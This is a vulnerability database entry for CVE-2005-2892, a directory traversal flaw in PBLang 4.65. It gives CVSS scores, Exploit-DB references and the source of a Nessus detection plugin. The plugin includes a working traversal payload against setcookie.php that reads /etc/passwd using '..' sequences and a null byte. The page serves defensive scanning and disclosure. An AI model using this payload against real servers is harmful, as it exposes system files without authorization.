Vulnerabilities > CVE-2005-2892 - Directory Traversal vulnerability in Pblang 4.65

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
network
low complexity
pblang
nessus
exploit available
NVD
Published: 2005-09-14
Updated: 2017-07-11

Summary

Directory traversal vulnerability in setcookie.php in PBLang 4.65, and possibly earlier versions, allows remote attackers to read arbitrary files via ".." sequences and "%00" (trailing null byte) in the u parameter.

Vulnerable Configurations

Part Description Count
Application
Pblang
1

Exploit-Db

  • descriptionPBLang Local file include Vulnerability. CVE-2005-2892. Webapps exploit for php platform
    idEDB-ID:18590
    last seen2016-02-02
    modified2012-03-13
    published2012-03-13
    reporterNumber 7
    sourcehttps://www.exploit-db.com/download/18590/
    titlePBLang Local file include Vulnerability
  • descriptionPBLang 4.65 Bulletin Board System SetCookie.PHP Directory Traversal Vulnerability. CVE-2005-2892. Webapps exploit for php platform
    idEDB-ID:26231
    last seen2016-02-03
    modified2005-09-07
    published2005-09-07
    reporterrgod
    sourcehttps://www.exploit-db.com/download/26231/
    titlePBLang 4.65 Bulletin Board System SetCookie.PHP Directory Traversal Vulnerability

Nessus

NASL familyCGI abuses
NASL idPBLANG_MULT_FLAWS.NASL
descriptionThe remote host is running PBLang, a bulletin board system that uses flat files and is written in PHP. The version of PBLang installed on the remote suffers from several vulnerabilities, including remote code execution, information disclosure, cross-site scripting, and path disclosure.
last seen2020-06-01
modified2020-06-02
plugin id19594
published2005-09-08
reporterThis script is Copyright (C) 2005-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/19594
titlePBLang 4.65 Multiple Vulnerabilities
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description) {
  script_id(19594);
  script_version("1.21");

  script_cve_id("CVE-2005-2892", "CVE-2005-2893", "CVE-2005-2894", "CVE-2005-2895");
  script_bugtraq_id(14765, 14766);

  script_name(english:"PBLang 4.65 Multiple Vulnerabilities");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that suffers from
multiple flaws." );
 script_set_attribute(attribute:"description", value:
"The remote host is running PBLang, a bulletin board system that uses
flat files and is written in PHP. 

The version of PBLang installed on the remote suffers from several
vulnerabilities, including remote code execution, information
disclosure, cross-site scripting, and path disclosure." );
 # https://web.archive.org/web/20120402152849/http://retrogod.altervista.org/pblang465.html
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?86f6e038");
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2005/Sep/77");
 script_set_attribute(attribute:"solution", value:
"Unknown at this time." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"false");
 script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);

 script_set_attribute(attribute:"plugin_publication_date", value: "2005/09/08");
 script_set_attribute(attribute:"vuln_publication_date", value: "2005/09/06");
 script_cvs_date("Date: 2018/11/15 20:50:18");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();

  script_summary(english:"Checks for multiple vulnerabilities in PBLang");
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");
  script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");
  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/PHP");
  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);

# Loop through CGI directories.
foreach dir (cgi_dirs()) {
  # Try to exploit the flaw in setcookie.php to read /etc/passwd.
  r = http_send_recv3(method: "GET", 
    item:string(
      dir, "/setcookie.php?",
      "u=../../../../../../../../../../../../etc/passwd%00&",
      "plugin=", SCRIPT_NAME
    ),
    port:port
  );
  if (isnull(r)) exit(0);

  # There's a problem if there's an entry for root.
  if (egrep(string: r[2], pattern: "root:.*:0:[01]:")) {
    security_hole(port);
    set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);
    exit(0);
  }
}

References